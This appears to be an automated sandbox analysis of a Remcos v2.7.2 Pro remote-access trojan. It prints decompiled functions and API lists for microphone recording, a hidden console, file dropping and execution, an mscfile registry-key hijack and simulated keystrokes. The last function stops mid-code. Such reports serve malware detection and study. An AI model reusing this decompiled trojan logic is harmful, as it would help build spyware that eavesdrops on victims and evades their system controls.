                                            0x013c1cca
                                            0x013c1ccd
                                            0x013c1cee
                                            0x013c1cf3
                                            0x013c1cf5
                                            0x013c1cf8
                                            0x013c1cf8
                                            0x013c1ccf
                                            0x013c1ccf
                                            0x013c1cd0
                                            0x013c1ce5
                                            0x013c1cd2
                                            0x013c1cd3
                                            0x013c1cd9
                                            0x013c1cd9
                                            0x013c1cd3
                                            0x013c1cd0
                                            0x013c1ccd
                                            0x013c1cc8
                                            0x013c1cc3
                                            0x013c1d6b
                                            0x013c1d73
                                            0x013c1d7c
                                            0x013c1d87

                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013C1C5E
                                            • SetEvent.KERNEL32(?), ref: 013C1C6D
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013C1C72
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F525DF0), ref: 013C1C8A
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 013C1C9A
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013C1CA9
                                              • Part of subcall function 013C29EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C29FA
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A11
                                              • Part of subcall function 013C29EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5), ref: 013C2A27
                                              • Part of subcall function 013C29EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 013C2A45
                                              • Part of subcall function 013C29EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A4F
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A58
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A6D
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A7A
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ACC
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2AD5
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ADE
                                            • SetEvent.KERNEL32(?), ref: 013C1CF8
                                            • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 013C1D0A
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C1D73
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013C1D7C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                            • String ID:
                                            • API String ID: 3236006214-0
                                            • Opcode ID: f002fcb59271abaaa08f582850082814bfc1f8ba5027b6223bcd9c6778a9be1e
                                            • Instruction ID: ad77a400e117c42aeabb56f40436339897f4cf092019115a500d8fd51316db91
                                            • Opcode Fuzzy Hash: f002fcb59271abaaa08f582850082814bfc1f8ba5027b6223bcd9c6778a9be1e
                                            • Instruction Fuzzy Hash: 2331A072A10209DFDB24FBA8EC5DAFE7B7CBF60B05F000819E502A3195EA70B944C751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B1519, Relevance: 15.1, APIs: 10, Instructions: 66COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 47%
                                            			E013B1519(WCHAR* __eax, void* __eflags) {
				char* _t4;
				signed int _t5;
				CHAR* _t10;
				signed int _t11;
				signed int _t19;
				signed int _t20;
				intOrPtr* _t26;
				void* _t27;

				_t27 = __eflags;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				CreateDirectoryW(__eax, 0);
				E013CB218.wFormatTag = 1;
				E013CB21A = 1;
				E013CB21C = 0x1f40;
				E013CB226 = 8;
				 *0x13cb220 = 0x1f40;
				 *0x13cb224 = 1;
				 *0x13cb228 = 0;
				_t4 = E013B180C(0x13cbcb0, _t27, 0x24);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t5 = atoi(_t4);
				_t19 = E013CB21C; // 0x0
				 *_t26 = 0x30008;
				_t20 = _t19 * _t5 * 0x3c;
				 *0x13cb1d0 = _t20;
				 *0x13cb1d8 = ((E013CB226 & 0x0000ffff) >> 3) * _t20;
				_t10 = waveInOpen( &E013CB210, 0xffffffff,  &E013CB218, E013B1640, 0, ??);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x13cb1d8);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				0x13cb1a0->lpData = _t10;
				_t11 =  *0x13cb1d8; // 0x0
				 *0x13cb1a4 = _t11;
				 *0x13cb1a8 = 0;
				 *0x13cb1ac = 0;
				 *0x13cb1b0 = 0;
				 *0x13cb1b4 = 0;
				waveInPrepareHeader(E013CB210, 0x13cb1a0, 0x20);
				waveInAddBuffer(E013CB210, 0x13cb1a0, 0x20);
				waveInStart(E013CB210);
				return 0;
			}











                                            0x013b1519
                                            0x013b1523
                                            0x013b152a
                                            0x013b153c
                                            0x013b1545
                                            0x013b154e
                                            0x013b1553
                                            0x013b155c
                                            0x013b1561
                                            0x013b156a
                                            0x013b1571
                                            0x013b1578
                                            0x013b157f
                                            0x013b1588
                                            0x013b158e
                                            0x013b1595
                                            0x013b15b7
                                            0x013b15bd
                                            0x013b15c2
                                            0x013b15d5
                                            0x013b15dd
                                            0x013b15eb
                                            0x013b15f0
                                            0x013b15fb
                                            0x013b1600
                                            0x013b1606
                                            0x013b160c
                                            0x013b1612
                                            0x013b1618
                                            0x013b1627
                                            0x013b1633
                                            0x013b163d

                                            APIs
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 013B1523
                                            • CreateDirectoryW.KERNEL32(00000000), ref: 013B152A
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 013B1578
                                            • atoi.MSVCRT ref: 013B157F
                                            • waveInOpen.WINMM(013CB210,000000FF,013CB218,013B1640,00000000), ref: 013B15C2
                                            • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 013B15D5
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013B15DD
                                            • waveInPrepareHeader.WINMM(013CB1A0,00000020), ref: 013B1618
                                            • waveInAddBuffer.WINMM(013CB1A0,00000020), ref: 013B1627
                                            • waveInStart.WINMM ref: 013B1633
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                            • String ID:
                                            • API String ID: 1097200658-0
                                            • Opcode ID: bf91c8b2f7e84ad7a143731ff1441167a079cfccba4617a27036c85ba1ded3e7
                                            • Instruction ID: cc46e3bf65873e3466e86f94f584776d2e7de197e2b50559c94de5cc985c0b40
                                            • Opcode Fuzzy Hash: bf91c8b2f7e84ad7a143731ff1441167a079cfccba4617a27036c85ba1ded3e7
                                            • Instruction Fuzzy Hash: D3212575640204DFC7219F25F84EA6EFAAEFB98796F00001EE501CA29CDBB5B841CB49
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BF153, Relevance: 15.1, APIs: 10, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013BF164
                                            • SetEvent.KERNEL32(?), ref: 013BF16D
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013BF176
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F525DF0), ref: 013BF18E
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 013BF19E
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013BF1AD
                                              • Part of subcall function 013C29EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C29FA
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A11
                                              • Part of subcall function 013C29EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5), ref: 013C2A27
                                              • Part of subcall function 013C29EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 013C2A45
                                              • Part of subcall function 013C29EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A4F
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A58
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A6D
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A7A
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ACC
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2AD5
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ADE
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013BF1D4
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013BF1EA
                                              • Part of subcall function 013BEFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5774,?,?,?,?), ref: 013BEFD0
                                              • Part of subcall function 013BEFB5: getenv.MSVCRT ref: 013BEFDC
                                              • Part of subcall function 013BEFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 013BEFE8
                                              • Part of subcall function 013BEFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BEFF5
                                              • Part of subcall function 013BEFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BF000
                                              • Part of subcall function 013BEFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BF009
                                              • Part of subcall function 013BEFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 013BF016
                                              • Part of subcall function 013BEFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 013BF023
                                              • Part of subcall function 013BEFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 013BF02F
                                              • Part of subcall function 013BEFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 013BF048
                                              • Part of subcall function 013BEFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 013BF055
                                              • Part of subcall function 013BEFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013BF074
                                              • Part of subcall function 013BEFB5: ShellExecuteExA.SHELL32(0000003C), ref: 013BF091
                                              • Part of subcall function 013BEFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5664,?), ref: 013BF0B5
                                              • Part of subcall function 013BEFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 013BF0C9
                                              • Part of subcall function 013BEFB5: CloseHandle.KERNEL32(?), ref: 013BF0D2
                                              • Part of subcall function 013BEFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013BF0DB
                                              • Part of subcall function 013BEFB5: DeleteFileA.KERNEL32(00000000), ref: 013BF0E2
                                              • Part of subcall function 013BEFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5664,?,?,?,?,?), ref: 013BF0FC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BF203
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BF20C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                            • String ID:
                                            • API String ID: 3444260106-0
                                            • Opcode ID: 4c288a689244cd4c1f954e4608fb52f123294e7010acc195029a84b4f423b70b
                                            • Instruction ID: 92b4664952b0db4c1f9e11d0907fcb945a6ca97d7199d113a9a2e6d3cf147027
                                            • Opcode Fuzzy Hash: 4c288a689244cd4c1f954e4608fb52f123294e7010acc195029a84b4f423b70b
                                            • Instruction Fuzzy Hash: 92210B71A1021AAFCF14BBA8DC599EE7B7CFF64305F040418E512A3194EB74B505CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C3D3D, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 90memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 63%
                                            			E013C3D3D(signed int __edx, intOrPtr _a4) {
				void _v1003;
				char _v1004;
				struct HWND__* _t13;
				signed int _t34;
				signed int _t36;
				unsigned int _t40;
				signed int _t41;
				signed int _t47;
				signed int _t50;
				signed int _t56;
				signed int _t59;
				signed int _t64;
				signed int _t65;
				void* _t91;
				void* _t92;
				void* _t93;

				_t64 = __edx;
				AllocConsole();
				_t13 =  *0x13cc1f8();
				 *0x13cc1fc = _t13;
				if(_a4 == 0) {
					ShowWindow(_t13, 0);
				}
				freopen("CONOUT$", "a", __imp___iob + 0x20);
				_v1004 = 0;
				memset( &_v1003, 0, 0xf9 << 2);
				asm("stosw");
				asm("stosb");
				_t65 = _t64 | 0xffffffff;
				asm("repne scasb");
				_t40 =  !_t65;
				_t91 = " * Remcos v" - _t40;
				_t41 = _t40 >> 2;
				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
				asm("repne scasb");
				_t47 =  !_t65;
				_t92 = "2.7.2 Pro" - _t47;
				_t34 = _t47;
				asm("repne scasb");
				_t50 = _t34 >> 2;
				memcpy( &_v1004 - 1, _t92, _t50 << 2);
				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
				asm("repne scasb");
				_t56 =  !_t65;
				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
				_t36 = _t56;
				asm("repne scasb");
				_t59 = _t36 >> 2;
				memcpy( &_v1004 - 1, _t93, _t59 << 2);
				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
				return printf( &_v1004);
			}



















                                            0x013c3d3d
                                            0x013c3d49
                                            0x013c3d4f
                                            0x013c3d57
                                            0x013c3d5f
                                            0x013c3d63
                                            0x013c3d63
                                            0x013c3d7c
                                            0x013c3d8f
                                            0x013c3d95
                                            0x013c3d97
                                            0x013c3d99
                                            0x013c3d9a
                                            0x013c3da6
                                            0x013c3da8
                                            0x013c3db4
                                            0x013c3dbe
                                            0x013c3dca
                                            0x013c3dd3
                                            0x013c3dd5
                                            0x013c3dd9
                                            0x013c3ddd
                                            0x013c3de1
                                            0x013c3de6
                                            0x013c3de9
                                            0x013c3df6
                                            0x013c3dff
                                            0x013c3e01
                                            0x013c3e05
                                            0x013c3e09
                                            0x013c3e0d
                                            0x013c3e12
                                            0x013c3e15
                                            0x013c3e23
                                            0x013c3e32

                                            APIs
                                            • AllocConsole.KERNEL32(747843E0,013CBCB0,00000000), ref: 013C3D49
                                            • ShowWindow.USER32(00000000,00000000), ref: 013C3D63
                                            • freopen.MSVCRT ref: 013C3D7C
                                            • printf.MSVCRT ref: 013C3E25
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocConsoleShowWindowfreopenprintf
                                            • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.2 Pro$CONOUT$
                                            • API String ID: 3419900118-1124569734
                                            • Opcode ID: 20e62684c145ab54a1b701d815570e3e1b9f9c5e22b18493f7b47fba3ef32b16
                                            • Instruction ID: 0e1f69a0406c51396a7affa81286d20f9b638e9e185578c86b24d2c1af031512
                                            • Opcode Fuzzy Hash: 20e62684c145ab54a1b701d815570e3e1b9f9c5e22b18493f7b47fba3ef32b16
                                            • Instruction Fuzzy Hash: 07210376B001080FCB299A7DD8A956E7A9BABC4655F84417EF80FD73C0DEB05E488B40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B31F8, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64COMMON
                                            Download Yara Rule
                                            APIs
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(013CBA38,013CBCB0,00000000), ref: 013B3224
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B322D
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 013B324D
                                              • Part of subcall function 013BB692: RegOpenKeyExA.KERNELBASE(80000001,013B936A,00000000,00020019,013B936A), ref: 013BB6AC
                                              • Part of subcall function 013BB692: RegQueryValueExA.KERNELBASE(013B936A,?,00000000,00000000,?,?,013CBCC0), ref: 013BB6C8
                                              • Part of subcall function 013BB692: RegCloseKey.KERNELBASE(013B936A), ref: 013BB6D3
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 013B3278
                                              • Part of subcall function 013BB708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 013BB715
                                              • Part of subcall function 013BB708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(013CBCB0,00000000,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB724
                                              • Part of subcall function 013BB708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB72E
                                              • Part of subcall function 013BB708: RegSetValueExA.KERNELBASE(?,013BB948,00000000,?,00000000,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB741
                                              • Part of subcall function 013BB708: RegCloseKey.ADVAPI32(?,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB74C
                                              • Part of subcall function 013BB708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB75B
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 013B3297
                                              • Part of subcall function 013BB95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 013BB96C
                                              • Part of subcall function 013BB95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013B32A4,?), ref: 013BB97C
                                              • Part of subcall function 013BB95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B32A4,80000001), ref: 013BB993
                                              • Part of subcall function 013BB95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B32A4), ref: 013BB9AB
                                              • Part of subcall function 013BB95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BB9C2
                                              • Part of subcall function 013BB95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BB9CB
                                              • Part of subcall function 013BB95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BB9D4
                                              • Part of subcall function 013BB95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BB9DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                            • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                            • API String ID: 1883807236-2313358711
                                            • Opcode ID: 4b7e2e4350c9da4d63532077bd4cf622310ddb0887c61d05b272ae5a81635169
                                            • Instruction ID: 2d5c5fb2861bc94a8e770de8fb2fe5add778877448141df1ddd98340ca127e29
                                            • Opcode Fuzzy Hash: 4b7e2e4350c9da4d63532077bd4cf622310ddb0887c61d05b272ae5a81635169
                                            • Instruction Fuzzy Hash: 3C118062B402143BDB11666CDC95BEFBF6C9B55605F000099FA01D7381DE706F0647E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C0440, Relevance: 12.1, APIs: 8, Instructions: 86keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendInput.USER32(00000001,013C021D,0000001C,?,?,00000000,013C021D), ref: 013C046B
                                            • SendInput.USER32(00000001,013C021D,0000001C,?,?,00000000,013C021D), ref: 013C0483
                                            • SendInput.USER32(00000001,013C021D,0000001C,?,?,00000000,013C021D), ref: 013C049B
                                            • SendInput.USER32(00000001,013C021D,0000001C,?,?,00000000,013C021D), ref: 013C04B0
                                            • SendInput.USER32(00000001,013C021D,0000001C,?,?,00000000,013C021D), ref: 013C04C3
                                            • SendInput.USER32(00000001,013C021D,0000001C,?,?,00000000,013C021D), ref: 013C04DA
                                            • SendInput.USER32(00000001,013C021D,0000001C,?,?,00000000,013C021D), ref: 013C04F1
                                            • SendInput.USER32(00000001,013C021D,0000001C,?,?,00000000,013C021D), ref: 013C0508
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: InputSend
                                            • String ID:
                                            • API String ID: 3431551938-0
                                            • Opcode ID: 7278c4511ffa79df1915686053fb26d7c2f205415324e54caea5889d347f3df7
                                            • Instruction ID: 6d59253a19886adb5249ae7ce588ad24080c94bfe250678542fa1207e1ed7061
                                            • Opcode Fuzzy Hash: 7278c4511ffa79df1915686053fb26d7c2f205415324e54caea5889d347f3df7
                                            • Instruction Fuzzy Hash: FA3130B1D5124EA9EB11EF949981FFFFFBCAF08705F50002AE640B6042D3B446459BE2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C1859, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E013C1859(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
